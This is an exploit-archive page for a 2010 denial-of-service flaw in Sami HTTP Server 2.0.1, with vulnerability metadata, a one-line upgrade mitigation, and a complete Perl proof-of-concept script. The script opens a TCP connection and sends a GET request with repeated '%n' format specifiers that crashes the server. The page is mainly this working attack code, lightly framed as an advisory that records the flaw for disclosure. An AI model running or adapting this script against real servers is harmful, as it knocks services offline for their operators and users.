header-logo
Suggest Exploit
vendor:
Sami HTTP Server
by:
wingthor
7,5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Sami HTTP Server
Affected Version From: 2.0.1
Affected Version To: 2.0.1
Patch Exists: YES
Related CWE: N/A
CPE: a:karjasoft:sami_http_server
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit

Sami HTTP Server 2.0.1 is vulnerable to a denial of service attack when a specially crafted GET request is sent to the server. This causes the server to crash and become unresponsive.

Mitigation:

Upgrade to the latest version of Sami HTTP Server.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Titel: Sami HTTP Server 2.0.1 GET Request Denial of Service Exploit
# Date: 25.10.10
# Tool: Sami HTTP Server -- Version: 2.0.1 
# Vendor-Website: http://www.karjasoft.com/old.php
# Download Link: http://www.karjasoft.com/files/samihttp/samihttpd_install.exe
# Author: wingthor
# Author-Website (German): http://www.wingthor.de
# Author-Email: exploit@wingthor.de
# Tested on: Windows XP SP3 
# Type: DOS/POC


use IO::Socket;

$target = "127.0.0.1";
$port   = 80;

$payload = "GET /%n%n%n%n%n HTTP/1.1\r\n\r\n";

$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";

$sock->send($payload);

close($sock);